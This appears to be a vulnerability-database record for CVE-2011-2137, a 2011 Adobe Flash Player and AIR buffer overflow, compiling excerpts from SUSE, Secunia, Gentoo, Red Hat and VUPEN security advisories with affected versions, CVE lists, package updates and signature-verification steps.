Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via unspecified vectors. Adobe Flash Player is prone to an unspecified cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The product enables viewing of applications, content and video across screens and browsers. Remote attackers can use unidentified vectors to bypass the same-origin policy and obtain sensitive information. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA45583
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45583/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
RELEASE DATE:
2011-08-11
DISCUSS ADVISORY:
http://secunia.com/advisories/45583/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45583/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to disclose sensitive
information and compromise a user's system.
1) An unspecified error can be exploited to cause a buffer overflow
and potentially execute arbitrary code.
2) An unspecified error can be exploited to cause a buffer overflow
and potentially execute arbitrary code.
3) An unspecified error can be exploited to corrupt memory and
potentially execute arbitrary code.
4) An integer overflow error can be exploited to corrupt memory and
potentially execute arbitrary code.
5) An unspecified error can be exploited to cause a buffer overflow
and potentially execute arbitrary code.
6) An integer overflow error can be exploited to corrupt memory and
potentially execute arbitrary code.
7) An unspecified error can be exploited to disclose certain
information from another domain.
8) An unspecified error can be exploited to corrupt memory and
potentially execute arbitrary code.
9) An unspecified error can be exploited to cause a buffer overflow
and potentially execute arbitrary code.
10) An unspecified error can be exploited to cause a buffer overflow
and potentially execute arbitrary code.
11) An integer overflow error can be exploited to corrupt memory and
potentially execute arbitrary code.
12) An unspecified error can be exploited to corrupt memory and
potentially execute arbitrary code.
13) An unspecified error can be exploited to corrupt memory and
potentially execute arbitrary code.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
The vendor credits:
2) Yang Dingning, NCNIPC, Graduate University of Chinese Academy of
Sciences
3) Wushi, Team 509 via iDefense Labs
4, 11) Vitaliy Toropov via iDefense Labs
5) Alexander Zaitsev, Positive Technologies
6, 8) An anonymous person via ZDI
7) Brandon Hardy
9) Bo Qu, Palo Alto Networks
10) Bo Qu, Palo Alto Networks and Honggang Ren, FortiGuard Labs
12) Marc Schoenefeld (Dr. rer. nat.), Red Hat Security Response Team
13) Honggang Ren, FortiGuard Labs
ORIGINAL ADVISORY:
Adobe (APSB11-21):
http://www.adobe.com/support/security/bulletins/apsb11-21.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
VAR-201108-0149 | CVE-2011-2137 | Adobe Flash Player and Adobe AIR Vulnerable to buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2414, and CVE-2011-2415. Adobe Flash Player and Adobe AIR Contains a buffer overflow vulnerability. This vulnerability CVE-2011-2130 , CVE-2011-2134 , CVE-2011-2414 ,and CVE-2011-2415 Is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. BACKGROUND
---------------------
"Adobe Flash Player is a cross-platform browser-based application runtime
that delivers uncompromised viewing of expressive applications, content,
and videos across screens and browsers. Flash Player delivers breakthrough
web experiences to over 98% of Internet users." from Adobe.com
II.
The vulnerability is caused by a buffer overflow error when processing a
malformed ActionScript FileReference method, which could be exploited by
remote attackers to compromise a vulnerable system by tricking a user
into visiting a specially crafted web page.
CVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE: CVE-2011-2137
III. Binary Analysis & Exploits/PoCs
---------------------------------------
In-depth binary analysis of the vulnerability and a code execution exploit
are available through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/english/services/ba-index.php
VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.
The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.
V. VUPEN Threat Protection Program
-----------------------------------
To proactively protect critical networks and infrastructures against
unpatched
vulnerabilities and reduce risks related to zero-day attacks, VUPEN shares
its
vulnerability research with governments and organizations members of the
VUPEN
Threat Protection Program (TPP).
VUPEN TPP customers receive fully detailed and technical reports about
security
vulnerabilities discovered by VUPEN and in advance of their public
disclosure.
http://www.vupen.com/english/services/tpp-index.php
VI. CREDIT
--------------
This vulnerability was discovered by Nicolas Joly of VUPEN Security
VIII. ABOUT VUPEN Security
---------------------------
VUPEN is the world leader in vulnerability research for defensive and
offensive security. VUPEN solutions enable corporations and governments to
measure and manage risks, eliminate vulnerabilities before they can be
exploited, and protect critical infrastructures and assets against
known and unknown vulnerabilities.
VUPEN has been recently recognized as "Entrepreneurial Company of the Year
in the Vulnerability Research Market (2011)" by Frost & Sullivan.
VUPEN solutions include:
* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php
* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php
IX. DISCLOSURE TIMELINE
-----------------------------
2011-04-28 - Vulnerability Discovered by VUPEN and shared with customers
2011-08-10 - Public disclosure
. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
